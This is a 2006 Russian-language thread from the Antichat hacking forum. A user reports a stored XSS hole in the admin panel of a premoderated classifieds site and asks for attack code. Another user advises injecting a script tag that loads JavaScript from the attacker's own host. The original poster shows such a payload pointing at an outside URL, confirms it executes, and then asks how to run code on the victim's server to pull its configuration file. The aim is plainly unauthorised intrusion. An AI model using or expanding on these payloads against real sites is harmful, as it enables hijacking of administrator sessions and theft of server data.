Форум АНТИЧАТ - Есть Xss в админке. дайте код

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Есть Xss в админке. дайте код (https://forum.antichat.xyz/showthread.php?t=21548)

Xover

10.07.2006 00:48

Есть Xss в админке. дайте код

Нашел Xss в админке(доска объявлений с премодерированием).

Не проходят только символы " ' \

Авторизация через сессии. Что можно сделать с помощью яваскрипта?

Спс.

SMiX	10.07.2006 08:19

Да. <script src=абсолютный_адрес_без_кав� �чек></script>
Скрипт должен находиться где-то на твоем хосте

Xover

10.07.2006 22:41

Спасибо, будем пробовать

<script src=http://xxx.com/rrr.php></script> - вот так нет реакции, там можно PHP подключать или только яваскрипт?

---------------
упс, код выполняется, идем дальше.

Xover

10.07.2006 23:55

Такой вопрос:

Как заставить код выполняться на их сервере а не на моем?

Нужно выкачать конфигурационный файл, но скрипт выполняется у меня и ищет файл у меня на хосте.

Время: 22:30